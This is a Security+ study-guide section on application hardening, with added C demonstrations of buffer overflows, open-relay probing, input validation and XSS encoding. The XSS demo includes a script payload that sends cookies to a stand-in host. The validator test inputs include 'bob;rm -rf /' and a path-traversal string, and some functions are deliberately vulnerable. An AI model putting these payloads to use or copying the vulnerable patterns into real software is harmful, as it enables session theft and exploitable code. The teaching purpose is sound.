1.4. Carry out the appropriate procedures to establish application security.

Application hardening is the task of imposing security on required applications and services. This usually involves tuning and configuring the native security features of the installed software and installing supportive security applications as needed. When you're developing new applications in house, it's also important to include security design, implementation, and integration throughout the development process.

NOTE

For more information on this topic, refer to Chapter 1 of the CompTIA Security+ Study Guide, 4th Edition (Sybex, November 2008).

Application hardening is often seen as a subelement of operating system hardening. In fact, many of the same steps and procedures used to lock down an operating system are used to harden an application or service. In addition to the general notion of disabling any unneeded protocols and services, you should also disable any unneeded features, functions, or capabilities of a service or protocol based on the server's role and the capabilities your organization needs.

1.4.1. ActiveX

ActiveX is a mobile code technology developed by Microsoft. ActiveX controls or components are stand-alone programs that can be attached to or embedded in web documents to perform a wide range of functions. ActiveX components are executed with the same security privileges as the current user. However, the ActiveX component is saved to the hard drive and can be accessed at a later time, even after you've left the website where it was obtained. Thus, ActiveX can be a significant security issue. It's recommended that ActiveX components not be downloaded or executed except from websites you're sure you can trust. In many cases, web browsers can be configured to always allow, always block, or prompt the user each time an ActiveX component is presented by a website.

One mechanism that helps reduce the amount of malicious mobile code downloaded and executed on a system is code signing, often called applet signing. A signed applet (or signed ActiveX control) is a piece of mobile code that has been digitally signed using the creator's or owner's certificate. The signature tells the user who published the code and lets the browser verify that it has not been altered since it was signed. Web browsers can be configured to accept only signed code or to prompt whenever a website offers any applet or control. It's important to understand that a signature only establishes the source and integrity of the code; it provides no guarantee as to its reliability, quality, or intent. Knowing where an applet comes from doesn't mean the applet isn't malicious or that it won't cause a problem on your system.

1.4.2. Java

Java is a programming language created by Sun Microsystems specifically to operate in the distributed environment of the Internet. Java is a write-once, run-anywhere solution that allows a programmer to write an applet once and have it run on any platform. There is a requirement that a Java Virtual Machine (JVM) be installed on every system, but since there is a JVM for every commercial/public OS, this is usually not an issue.

Java is designed to run applets inside a restricted memory space and execution container known as a sandbox. The sandbox limits what an untrusted applet can do (no arbitrary file or network access, for example), which makes it harder to do damage with malicious Java code. Applets are not installed persistently on the system and do not inherit the full access privileges of the user. Thus, Java is designed as a more secure mobile code system. However, malicious Java applets do exist, and many of them rely on social engineering, such as persuading the user to grant a signed applet full privileges, rather than on defeating the sandbox directly.

Java should only be allowed to execute if it is from a known trusted source.

1.4.3. Scripting

Scripting is a type of programming in which the program, or script, remains in its original human-readable form and does not need to be compiled before it can run. Instead, the OS or a script interpreter (such as Perl) reads and executes the source directly, in some cases compiling it just in time (JIT) as it runs. Scripting is a powerful and flexible tool used by many tech-savvy administrators. However, scripting can also be employed for malicious purposes, so it is always a good idea to inspect and/or scan any script for malicious code before running it, especially a script obtained from an outside source.

JavaScript is a scripting language that can be embedded directly in the HTML of a web page. It's executed by the web browser and can be used to perform a wide range of functions, both benign and malicious. Despite the name, JavaScript is unrelated to Java, and it does not get the sandboxed, stand-alone treatment an applet gets; it runs inside the browser with the full privileges of the page that delivered it. The browser's same-origin policy keeps a script from reading other sites' data, and it cannot normally touch files or system resources directly, but it can read and modify the page, send requests that carry the user's cookies, and exploit any bug in the browser or its plug-ins. Because a script from an untrusted site runs automatically as soon as the page loads, it's generally recommended that you disable JavaScript except for websites you're sure you can trust.

Common Gateway Interface (CGI) is a mechanism developed early in the life of the Web to let a web server hand information submitted by a browser (typically form data or query-string parameters) to a server-side script or program for processing. Although CGI isn't used as widely as JavaScript or ActiveX today, many web servers still ship with CGI support available, and the browser needs no special support at all: from its point of view a CGI script is just another URL.

CGI has had numerous vulnerabilities, the most prevalent of which is that a user can submit data the script was never written to expect, causing it to fail, to overflow a buffer, or to perform an unauthorized or unwanted action (at least from the perspective of the web server owner). The classic example is a script that passes user input to a shell command without filtering shell metacharacters.

Another issue with CGI is that the web server must be allowed to execute files in every directory that hosts CGI scripts. If the server's folder hierarchy isn't properly protected, in particular if a directory that accepts uploads is also marked executable, a user could upload their own script and then execute it simply by requesting its URL.

To protect against CGI vulnerabilities, either don't use CGI or lock down the web folders appropriately: keep scripts in a dedicated directory outside the document root (an Apache ScriptAlias directory with ExecCGI, for example) and never enable script execution for directories that accept uploads. Also, thoroughly inspect all CGI scripts for malicious code and for unsafe handling of input before use. When possible, write and review your own scripts rather than deploying someone else's unread.

1.4.4. Browser

A browser (or web browser) is the client software used to interact with the Web. Browsers are usually graphical in nature, but there are several popular text-only or command-line browsers. Browsers grant users access to the vast repositories of information and resources distributed around the globe via the Internet's World Wide Web. Unfortunately, browsers bring security risks to their host computers.

A browser can be used to access malicious websites, which can result in information leakage, identity theft, or downloading of malicious code. It is important to practice safe surfing habits by being cautious and not downloading content from sources you don't fully trust.

Browsers should be kept current with patches and updates from the vendor. The OS should be hardened, and both a firewall and antivirus software should be running and kept updated. Block access to all known risky or malicious sites. Only accept downloadable code from known trusted and signed sources.

1.4.5. Buffer overflows

Software exploitation attacks are directed toward known flaws, bugs, errors, oversights, or normal functions of the operating system, protocols, services, or installed applications. One of the most common forms of software exploitation is a buffer overflow attack.

A buffer overflow attack occurs when an attacker submits data to a process that is larger than the variable (the buffer) meant to receive it. Unless the program checks the length before copying, the extra data spills over into whatever is stored next to the buffer in memory. On the stack this includes the function's saved return address, so carefully crafted input can redirect execution to code the attacker supplied, which then runs with the privileges of the vulnerable process. Buffer overflow attacks can result in system crashes, corrupted data, privilege escalation, or just about anything else a hacker can think of. The primary countermeasures are to patch the software when issues are discovered and to write software that validates the length of every input before accepting it for processing; compiler and OS protections such as stack canaries, non-executable memory, and address space layout randomization make exploitation harder but do not remove the underlying bug.

Once a weakness is discovered in software, a hacker often writes an exploit or attack tool. These tools are easily accessible on the Internet. They allow anyone to grab the tool and point it at a victim to perform the attack, even when the attacker has no knowledge of how to perform the attack.

The mechanics are worth restating. A buffer overflow occurs when a program receives input that is larger than it was designed to accept or process. Because the copy is performed without a bounds check, the extra bytes overwrite adjacent memory; if the attacker controls those bytes, they can replace a saved return address or function pointer so that the CPU jumps to attacker-chosen instructions, which run with the same privileges as the vulnerable program (system-level privileges when the program is a service running as root or SYSTEM). There are many possible results of a buffer overflow, including a program crash, a system freeze or crash, opening a port, disabling a service, creating a user account, elevating the privileges of an existing user account, accessing a website, or executing a utility. Clever attackers can do just about anything they wish once they can execute their own commands or scripts on a system.

Sometimes a buffer overflow attack can be labeled as a form of DoS attack, since a buffer overflow occurs when a system receives more data than it can handle (a bit like a flooding attack). This is especially true when the buffer overflow event results in a system no longer being able to process legitimate data or requests.

Poor programming quality controls and missing input length checks are what make buffer overflow attacks possible; the problem is concentrated in software written in languages such as C and C++ that do not check array bounds automatically. Unfortunately, a great deal of commercial software has had buffer overflow vulnerabilities, and network-facing services such as web servers are attacked most frequently. Fortunately, buffer overflow vulnerabilities are often easily patched with vendor updates.
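The mechanics described above, as an added example that is not from the study guide: a C program that models a buffer and the variable stored next to it as one array, performs the unchecked copy the way strcpy would, and shows the neighbouring value being overwritten, beside a bounded copy that rejects oversized input. The frame layout, the "privilege flag" and the attack string are constructions for the demonstration, not real program state.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example, not from the study guide.  A 32-byte array stands in for a
 * stack frame: bytes 0-15 are the input buffer, bytes 16-19 a neighbouring
 * variable (a privilege flag here; in a real frame it could be the saved
 * return address).  Modelling the frame as one array keeps every write
 * inside a single object, so the demonstration is well-defined C.
 */
enum { BUF_LEN = 16, FLAG_OFF = 16, FRAME_LEN = 32 };

/* Set up a frame with an empty buffer and a known flag value. */
void frame_init(unsigned char *frame, unsigned flag)
{
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + FLAG_OFF, &flag, sizeof flag);
}

/* Read back the neighbouring variable. */
unsigned frame_flag(const unsigned char *frame)
{
    unsigned v;
    memcpy(&v, frame + FLAG_OFF, sizeof v);
    return v;
}

/* Vulnerable: copies strlen(input)+1 bytes with no check against BUF_LEN,
 * exactly what strcpy(buf, input) does.  Input of 16 or more characters
 * overwrites whatever follows the buffer.  (The cap at FRAME_LEN only keeps
 * this model inside its array; the real bug has no cap at all.) */
void copy_unchecked(unsigned char *frame, const char *input)
{
    size_t n = strlen(input) + 1;
    if (n > FRAME_LEN)
        n = FRAME_LEN;
    memcpy(frame, input, n);
}

/* Hardened: validate the length before copying.  Oversized input is rejected
 * outright rather than silently truncated, and the result is always
 * NUL-terminated.  Returns 0 on success, -1 on rejection. */
int copy_checked(unsigned char *frame, const char *input)
{
    size_t len = strlen(input);
    if (len >= BUF_LEN)
        return -1;
    memcpy(frame, input, len + 1);
    return 0;
}

/* Flag value after an unchecked copy of `input` into a fresh frame (flag 0). */
unsigned flag_after_unchecked(const char *input)
{
    unsigned char frame[FRAME_LEN];
    frame_init(frame, 0);
    copy_unchecked(frame, input);
    return frame_flag(frame);
}

/* Result of the checked copy; *flag_out receives the flag afterwards. */
int flag_after_checked(const char *input, unsigned *flag_out)
{
    unsigned char frame[FRAME_LEN];
    int rc;
    frame_init(frame, 0);
    rc = copy_checked(frame, input);
    *flag_out = frame_flag(frame);
    return rc;
}

int main(void)
{
    /* Constructed attack string: 16 'A's fill the buffer, the next four
     * bytes (0x01 each) land on the flag and turn 0 into 0x01010101. */
    const char *attack = "AAAAAAAA" "AAAAAAAA" "\x01\x01\x01\x01";
    unsigned flag;
    int rc;

    printf("unchecked copy: flag = 0x%08x\n", flag_after_unchecked(attack));
    rc = flag_after_checked(attack, &flag);
    printf("checked copy:   rc = %d, flag = 0x%08x\n", rc, flag);
    return 0;
}
```

The unchecked copy reports the flag as 0x01010101 even though no code ever assigned it; the checked copy returns -1 and the flag stays 0. In a real program the bytes after the buffer are chosen by the compiler, not by the model, which is why a fixed-size buffer must always be paired with a length check or a bounded copy.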

1.4.6. Cookies

A cookie is a small piece of data a web server stores in the browser so that it can recognize the user across a series of page requests; HTTP itself has no memory of earlier requests. Cookies are used to maintain an e-commerce shopping cart, focus product placement, or track your visiting habits. However, the benign purposes of cookies have been subverted by malevolent entities. Cookies are now a common means of violating your privacy by gathering information about your identity, logon credentials, surfing habits, work habits, and much more. If a cookie carries authentication data, anyone who can read it, whether by sniffing an unencrypted connection, through a cross-site scripting flaw, or by reading the browser's cookie store, can impersonate the victim online. It's generally recommended that you block third-party cookies from everyone and first-party cookies from all but the most trusted sites. Trusted sites are usually those that protect your identity by not including such details in a cookie; instead, they place only a random session ID in the cookie and keep all of your personal information in a back-end database. A cookie of this kind is commonly called a session cookie, and the server should mark it Secure (sent only over HTTPS) and HttpOnly (not readable by scripts) to limit theft. Without allowing trusted first-party session cookies, functions such as e-commerce shopping carts, online banking, and even posting to discussion forums would be disabled.

1.4.7. SMTP open relays

E-mail is the most widely used communication vehicle on the Internet. However, it has also become one of the primary delivery mechanisms for malicious code and social-engineering attacks. Understanding e-mail security issues is essential to the Security+ exam.

Internet-based e-mail relies primarily on a single protocol for moving messages between servers: Simple Mail Transfer Protocol (SMTP). Figure 1.1 shows how clients and servers connect. SMTP has proven itself over more than 20 years as a reliable e-mail delivery system. However, it has one significant flaw: its nearly complete lack of security. Base SMTP offers neither encryption for transmitted messages nor any verification of who the sender is, so any e-mail sent over it can be snooped, examined, and forged. As e-mail becomes the basis for business communications, cleartext communication is no longer a viable option. Fortunately, SMTP supports add-on capabilities that bring encryption and other security services to e-mail, such as the STARTTLS extension for encrypting the connection between servers and SMTP authentication for verifying clients. SMTP operates over TCP port 25.

Other protocols are involved with a complete e-mail solution. Post Office Protocol (POP3) and Internet Message Access Protocol (IMAP) are used to pull e-mail from an e-mail server down to a client, but they aren't involved in moving e-mail across the Internet. POP3 operates over TCP port 110, and IMAP operates over TCP port 143. Because e-mail is natively insecure, several encryption options have been developed to add security to e-mail used over the Internet. Two of the most common solutions are Secure Multipurpose Internet Mail Extensions (S/MIME) and Pretty Good Privacy (PGP).

S/MIME is an Internet standard for encrypting and digitally signing e-mail. It uses X.509 certificates and RSA (an asymmetric encryption scheme) to sign messages and to protect the symmetric key that actually encrypts each message body.

PGP is likewise used to encrypt and digitally sign e-mail messages. It uses RSA or Diffie-Hellman/DSS asymmetric cryptography to protect a per-message symmetric key, but it relies on a web of trust among users rather than on certificates issued by a certificate authority.

SMTP relay is the feature or function of an SMTP or e-mail server when it receives an e-mail from a client or other SMTP server and then forwards it on to another SMTP server. The forwarding action is similar to normal network packet routing, in that the purpose is to transmit the e-mail message to its destination. E-mail relaying is an essential part of the success of Internet e-mail, but it can be abused.

Figure 1.1. E-mail connections between clients and a server

E-mail relaying abuse often leads to DoS attacks or spam. Spam (specifically, spoofed spam) is often sent by rogue solicitors who find e-mail servers on the Internet that aren't properly configured to check who is allowed to hand them mail before accepting it. An SMTP server that accepts mail from any sender on the Internet and forwards it to any destination, without requiring the client to authenticate, to come from the local network, or to be delivering to a domain the server is responsible for, is known as an open relay. Besides carrying spam, an open relay quickly gets the owner's server blacklisted by other mail operators.

When you're deploying and securing an SMTP server, it's important to disable open relaying: the server should forward mail only for authenticated clients or for clients on the internal network, and accept mail from the outside only when it is addressed to one of the server's own domains. However, even after an SMTP server has been secured, a clever attacker may be able to reenable relaying using a Trojan horse, buffer overflow, or remote access attack against the system. Thus, it's important to regularly check the logs and configuration settings of e-mail servers. One important item to look for is a universal acceptance setting that would allow unrestricted and unverified relaying. For example, a Unix mail server keeps a list of networks and domains it is willing to relay for; if that list contains a wildcard that matches everything (a dot and an asterisk, .*, in some configurations, or 0.0.0.0/0 in a Postfix mynetworks setting), remove the entry and reload the mail server's configuration to force the change to take effect. You can then confirm the fix from an outside host by connecting to port 25 and attempting to send mail from an outside address to an outside address; a properly configured server answers the RCPT TO command with a 5xx refusal such as "Relay access denied".
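The open-relay check just described, as an added example that is not from the study guide: a C implementation of the client side of the SMTP exchange (EHLO, MAIL FROM, RCPT TO, RSET) together with a scripted stand-in for the server, so that both sides of the conversation are visible and the check runs offline. The transport hook, the example.com server, and all hostnames and addresses are assumptions made for the demonstration; a real probe would plug a TCP connection into the same hook.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the study guide: the SMTP exchange an open-relay
 * check performs, with a scripted stand-in for the server so it runs offline.
 * The client side sends what a real probe would send over TCP port 25; only
 * the transport is faked.  Hostnames and addresses are made up. */

/* Transport hook: send one command line, receive one reply line; 0 = ok. */
typedef int (*smtp_exchange_fn)(void *ctx, const char *cmd, char *reply, size_t cap);

/* Three-digit code at the start of an SMTP reply, or 0 if malformed. */
int smtp_reply_code(const char *reply)
{
    int code = 0;
    for (int i = 0; i < 3; i++) {
        if (reply[i] < '0' || reply[i] > '9') return 0;
        code = code * 10 + (reply[i] - '0');
    }
    return code;
}

/* Open-relay probe: 1 = recipient accepted, 0 = refused at RCPT TO, -1 =
 * protocol/transport error.  RSET is sent afterwards so nothing is queued.
 * "Accepted" means "open relay" only when both `from` and `to` lie outside
 * every domain the server delivers for. */
int probe_open_relay(smtp_exchange_fn xfer, void *ctx, const char *probe_host,
                     const char *from, const char *to)
{
    char cmd[256], reply[512];
    int code;
    snprintf(cmd, sizeof cmd, "EHLO %s\r\n", probe_host);
    if (xfer(ctx, cmd, reply, sizeof reply) || smtp_reply_code(reply) != 250) return -1;
    snprintf(cmd, sizeof cmd, "MAIL FROM:<%s>\r\n", from);
    if (xfer(ctx, cmd, reply, sizeof reply) || smtp_reply_code(reply) != 250) return -1;
    snprintf(cmd, sizeof cmd, "RCPT TO:<%s>\r\n", to);
    if (xfer(ctx, cmd, reply, sizeof reply)) return -1;
    code = smtp_reply_code(reply);
    xfer(ctx, "RSET\r\n", reply, sizeof reply);   /* abandon the transaction */

    if (code == 250 || code == 251) return 1;     /* relayed */
    if (code >= 400 && code < 600) return 0;      /* e.g. 554 5.7.1 Relay access denied */
    return -1;
}

/* Scripted server: the one domain it delivers for, and its relay policy. */
typedef struct {
    const char *local_domain;
    int relay_for_anyone;       /* 1 = misconfigured as an open relay */
} fake_server;

static const char *domain_of(const char *addr)
{
    const char *at = strchr(addr, '@');
    return at ? at + 1 : "";
}

/* Server side of the exchange.  The relay decision lives in the RCPT branch:
 * a correct server accepts outside mail only for its own domain. */
int fake_exchange(void *ctx, const char *cmd, char *reply, size_t cap)
{
    fake_server *s = ctx;
    char rcpt[256];
    const char *end;
    size_t n;
    if (strncmp(cmd, "EHLO ", 5) == 0)
        snprintf(reply, cap, "250 %s Hello\r\n", s->local_domain);
    else if (strncmp(cmd, "MAIL FROM:<", 11) == 0 || strncmp(cmd, "RSET", 4) == 0)
        snprintf(reply, cap, "250 2.0.0 Ok\r\n");
    else if (strncmp(cmd, "RCPT TO:<", 9) == 0 && (end = strchr(cmd + 9, '>')) != NULL
             && (n = (size_t)(end - (cmd + 9))) < sizeof rcpt) {
        memcpy(rcpt, cmd + 9, n);
        rcpt[n] = '\0';
        if (s->relay_for_anyone || strcmp(domain_of(rcpt), s->local_domain) == 0)
            snprintf(reply, cap, "250 2.1.5 Ok\r\n");
        else
            snprintf(reply, cap, "554 5.7.1 <%s>: Relay access denied\r\n", rcpt);
    } else
        snprintf(reply, cap, "500 5.5.2 Error: command not recognized\r\n");
    return 0;
}

/* Probe a scripted example.com server (open or closed) for delivery to `to`. */
int probe_scripted(int open_relay, const char *to)
{
    fake_server s = { "example.com", open_relay };
    return probe_open_relay(fake_exchange, &s, "probe.test", "attacker@evil.test", to);
}

int main(void)
{
    printf("open relay, outside recipient:   %d\n", probe_scripted(1, "victim@other.test"));
    printf("closed relay, outside recipient: %d\n", probe_scripted(0, "victim@other.test"));
    printf("closed relay, local recipient:   %d\n", probe_scripted(0, "user@example.com"));
    return 0;
}
```

Note the third case: a correctly configured server still answers 250 to a recipient in its own domain, because that is ordinary inbound delivery, not relaying. A probe that uses a local recipient will therefore report every server as "open"; the recipient, like the sender, has to be an address the server is not responsible for.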

1.4.8. Instant messaging

Instant messaging (IM) is a mechanism that allows for real-time text-based chat between two users located anywhere on the Internet. Some IM utilities allow for file transfer, multimedia, voice and video conferencing, and more. However, unlike many Internet information services, such as the Web, FTP, and e-mail, IM largely operates as a peer-to-peer service: the provider's servers may help users find each other, but the sessions are set up between the users' clients, and no server under the organization's control is involved. This makes IM easy for end users to deploy and use, but difficult to manage from a corporate perspective. IM is insecure. It has numerous vulnerabilities: it is susceptible to packet sniffing, it lacks true native security capabilities, and it provides no protection for privacy.

Instant messaging offers little in the way of security or privacy. Many IM clients are susceptible to malicious code deposit or infection through their file transfer capabilities. Also, IM users are often subject to numerous forms of social-engineering attacks, such as impersonation or convincing a victim to reveal information that should remain confidential (such as passwords).

Most IM clients don't use encryption when transmitting messages, so communications travel in the clear and are subject to packet sniffing and eavesdropping attacks. Nor do IM clients provide any direct protection for user privacy; any private or confidential information typed into an IM session should be assumed to be readable by anyone positioned on the network path.

1.4.9. P2P

P2P (peer to peer) is a file-sharing system that allows for the decentralized distribution of files over the Internet. P2P can be used to distribute legitimate free, open-source, or public content. However, P2P is often used to distribute illegal content such as pirated music, software, and movies. There are many varieties of P2P mechanisms; one of the more prevalent systems is known as BitTorrent.

Because P2P is a file distribution system, common precautions should be taken. First, try not to download files from untrusted sources. Second, scan every file with an antivirus scanner before use. Third, don't access or distribute content that is not free and legal to distribute. Even with these precautions, P2P can be a bandwidth hog and there is always the possibility that the P2P software can involve your system in distributing illegal content even without your direct permission. Because of these issues, organizations often ban P2P as a standard policy.

1.4.10. Input validation

Input validation is an aspect of defensive programming intended to ward off a wide range of input-focused attacks, such as buffer overflows and fuzzing. A fuzzing attack occurs when an attacker sends a variety of types and sizes of content to input points to see if they can trigger an abnormal response. Input validation checks each and every input received before it is allowed to be processed. The check could be a length, character type, language type, domain (allowed range of values), or even timing check, and its purpose is to prevent unknown, unwanted, or unexpected content from reaching the core program. The most robust checks are allow-lists that define exactly what acceptable input looks like and reject everything else, rather than block-lists that try to enumerate known-bad input.
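The kinds of check listed above (length, character type, syntax, range), as an added example that is not from the study guide: allow-list validators in C for two typical fields, a username and a TCP port number, run over a constructed set of fuzz-style inputs. The field names, maximum lengths and permitted character set are assumptions made for the demonstration, not rules stated in the text.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not from the study guide: allow-list validation of two
 * typical input fields, applied before anything else touches the data.  The
 * field rules (names, maximum lengths, character set) are assumptions made
 * for the demonstration, not rules from the text. */

typedef enum {
    VALID = 0,
    ERR_EMPTY,        /* nothing supplied */
    ERR_TOO_LONG,     /* length check failed */
    ERR_BAD_CHAR,     /* character-type check failed */
    ERR_NOT_NUMBER,   /* syntax check failed */
    ERR_OUT_OF_RANGE  /* domain (range) check failed */
} verdict;

#define USERNAME_MAX 32

/* Username: 1..32 bytes, each from an explicit allow-list.  Because the
 * length is checked first, later code may copy the value into a fixed
 * USERNAME_MAX + 1 buffer without risk of overflow. */
verdict validate_username(const char *s)
{
    size_t len = strlen(s);
    if (len == 0) return ERR_EMPTY;
    if (len > USERNAME_MAX) return ERR_TOO_LONG;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        /* Anything not listed is rejected: spaces, quotes, ';', '<', '/',
         * control characters and bytes above 0x7f included. */
        if (!(isalnum(c) || c == '_' || c == '.' || c == '-'))
            return ERR_BAD_CHAR;
    }
    return VALID;
}

/* TCP port: decimal digits only, the whole string consumed, value 1..65535.
 * strtol by itself would accept " 80", "+80" and "80abc", so the syntax is
 * checked before conversion and the end pointer after it. */
verdict validate_port(const char *s, int *port_out)
{
    size_t len = strlen(s);
    char *end;
    long v;

    if (len == 0) return ERR_EMPTY;
    if (len > 5) return ERR_TOO_LONG;            /* 65535 has five digits */
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)s[i])) return ERR_NOT_NUMBER;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0') return ERR_NOT_NUMBER;
    if (v < 1 || v > 65535) return ERR_OUT_OF_RANGE;
    *port_out = (int)v;
    return VALID;
}

/* Fuzz-style sweep: run every input through validate_username and return
 * how many were accepted.  With the allow-list above, only well-formed
 * names get through. */
size_t count_accepted_usernames(const char *const *inputs, size_t n)
{
    size_t accepted = 0;
    for (size_t i = 0; i < n; i++)
        if (validate_username(inputs[i]) == VALID) accepted++;
    return accepted;
}

int main(void)
{
    /* Constructed inputs of the kind a fuzzer or an attacker would send. */
    static const char *const names[] = {
        "alice_01", "", "bob;rm -rf /", "<script>", "o'neil", "../etc/passwd",
        "aaaaaaaaaa" "aaaaaaaaaa" "aaaaaaaaaa" "aaaaaaaaaa"   /* 40 chars */
    };
    static const char *const ports[] = { "443", "80abc", "+80", "0", "70000", " 80" };
    size_t i;
    int p;

    printf("usernames accepted: %zu of %zu\n",
           count_accepted_usernames(names, sizeof names / sizeof names[0]),
           sizeof names / sizeof names[0]);
    for (i = 0; i < sizeof ports / sizeof ports[0]; i++)
        printf("port %-6s -> verdict %d\n", ports[i], validate_port(ports[i], &p));
    return 0;
}
```

Each validator returns a reason code rather than a bare yes/no, which is what a log entry or a fuzzing harness needs to tell a length failure from a character-set failure. The port check shows why "is it a number?" is not enough on its own: the value also has to lie in the domain the program can handle.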

1.4.11. Cross-site scripting (XSS)

Cross-site scripting (XSS) is a form of code injection attack in which an attacker gets their own script into the content a web server sends to other visitors, without having to compromise the server itself: the attacker supplies input (a form field, a URL parameter, a forum post) that the site echoes back into its pages without encoding it, so the browser of every later visitor treats it as part of the site's own markup and runs it with that site's privileges. Hackers have found numerous and ingenious ways to get injected content in front of users, via CGI scripts that echo input, web server software vulnerabilities, SQL injection, frame exploitation, DNS redirects, cookie hijacking, and many other forms of attack. A successful XSS attack could result in identity theft, credential or session cookie theft, data theft, financial losses, or planting of remote control software on visiting clients.

The defense that actually removes XSS is in the application: validate input and, more importantly, encode every untrusted value for the context in which it is output (HTML text, attribute, JavaScript, URL) so that it can never be interpreted as markup; marking session cookies HttpOnly limits what a successful injection can steal. Around the application, maintain a patched web server, use firewalls, and audit for suspicious activity. As a web user, you can reduce your exposure by keeping your system patched, running antivirus software, and avoiding nonmainstream websites, although a flaw on a trusted site will still affect you.
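The reflection and the encoding defense described above, as an added example that is not from the study guide: a C rendering routine that echoes a query parameter into a page unencoded, beside the hardened version that passes it through an HTML encoder first, with a check that shows the script tag surviving one path and not the other. The "search results" page, its parameter, and the attacker's input are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the study guide: the reflection that makes a page
 * vulnerable to XSS, beside the output encoding that neutralises it.  The
 * "search results" page and its parameter are invented for the demo. */

/* Replacement for each character that can change meaning inside HTML text
 * or a quoted attribute; NULL for everything else. */
static const char *html_entity(char c)
{
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#x27;";
    default:   return NULL;
    }
}

/* Encode `in` for HTML output.  Returns the encoded length (excluding the
 * terminator) or -1 if `cap` is too small, in which case nothing is written.
 * Sizing is checked up front so a long value can never overflow `out`. */
int html_escape(const char *in, char *out, size_t cap)
{
    size_t need = 0, used = 0;
    for (const char *p = in; *p; p++) {
        const char *rep = html_entity(*p);
        need += rep ? strlen(rep) : 1;
    }
    if (need + 1 > cap) return -1;
    for (const char *p = in; *p; p++) {
        const char *rep = html_entity(*p);
        if (rep) { size_t n = strlen(rep); memcpy(out + used, rep, n); used += n; }
        else      out[used++] = *p;
    }
    out[used] = '\0';
    return (int)used;
}

/* Vulnerable: echoes the query straight into the page.  A query such as
 * <script>...</script> becomes live markup for whoever views the page. */
int render_unsafe(const char *query, char *page, size_t cap)
{
    return snprintf(page, cap, "<p>Results for: %s</p>", query);
}

/* Hardened: the untrusted value is encoded for the HTML context it lands in. */
int render_safe(const char *query, char *page, size_t cap)
{
    char enc[1024];
    if (html_escape(query, enc, sizeof enc) < 0) return -1;
    return snprintf(page, cap, "<p>Results for: %s</p>", enc);
}

/* 1 if rendering `query` through the chosen path leaves a raw <script tag
 * in the page, else 0. */
int page_has_script_tag(const char *query, int hardened)
{
    char page[2048];
    int n = hardened ? render_safe(query, page, sizeof page)
                     : render_unsafe(query, page, sizeof page);
    return n >= 0 && strstr(page, "<script") != NULL;
}

int main(void)
{
    /* Constructed attacker input: a URL parameter carrying a script tag. */
    const char *q = "<script>document.location='http://evil.test/?c='+document.cookie</script>";
    char page[2048];

    render_unsafe(q, page, sizeof page);
    printf("unsafe: %s\n", page);
    render_safe(q, page, sizeof page);
    printf("safe:   %s\n", page);
    return 0;
}
```

The encoder covers the HTML text and attribute contexts only; a value written into a script block, a URL, or a CSS rule needs the encoding for that context instead, and a value that fails to fit the output buffer is refused rather than truncated, since a truncated entity is itself a way to smuggle markup through.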

1.4.12. Exam Essentials


ActiveX

ActiveX is a mobile code framework from Microsoft. ActiveX controls run with the privileges of the current user and remain on the system after download. Only allow signed controls from sites you trust.


Java

Java is a mobile code language from Sun Microsystems. Java was designed as a secure solution for the distributed Internet. Java runs in a sandbox.


JavaScript

JavaScript is a scripting language that can be embedded directly into the HTML of a web page and is executed by the browser. Unlike its namesake Java, it is not run as a sandboxed applet; it runs with the full privileges of the page that delivered it, so it can read and alter the page, send requests carrying the user's cookies, and exploit browser bugs, and it runs automatically as soon as the page loads. It's generally recommended that you disable JavaScript except for those websites you're sure you can trust.


Signed applets

A signed applet is a piece of mobile code that has been digitally signed using the creator's or owner's certificate. A signed applet clearly indicates to the user the source of the applet.


Buffer overflows

Buffer overflows occur due to a lack of secure defensive programming: a program receives input larger than the buffer it was designed to hold and copies it without a bounds check, so the excess overwrites adjacent memory. The exploitation of a buffer overflow can result in a system crash or arbitrary code execution with the privileges of the vulnerable program. Results can include a program crash, a system freeze or crash, opening a port, disabling a service, creating a user account, elevating the privileges of an existing user account, accessing a website, or executing a utility.


Cookies

A cookie is a tracking mechanism developed for web servers to monitor and respond to a user's serial viewing of multiple web pages. A cookie may allow identity theft.


SMTP open relay

An SMTP open relay can be abused to send spam, hoaxes, or malicious attachments.


SMTP

Simple Mail Transfer Protocol (SMTP) moves e-mail messages across the Internet from sender to recipient. It doesn't include native encryption. It operates over TCP port 25.


POP3 and IMAP

Post Office Protocol (POP3) and Internet Message Access Protocol (IMAP) are used to pull e-mail from an e-mail server down to a client. POP3 operates over TCP port 110. IMAP operates over TCP port 143.


XSS

Cross-site scripting (XSS) is a form of code injection attack in which an attacker gets their own script into the content a web server sends to other visitors by supplying input that the site echoes into its pages without encoding it; compromising the server itself is not required.


Application hardening

Application hardening is the task of imposing security on required applications and services. This usually involves tuning and configuring the native security features of the installed software and installing supportive security applications as needed. When you're developing new applications in house, it's also important to include security design, implementation, and integration throughout the development process.
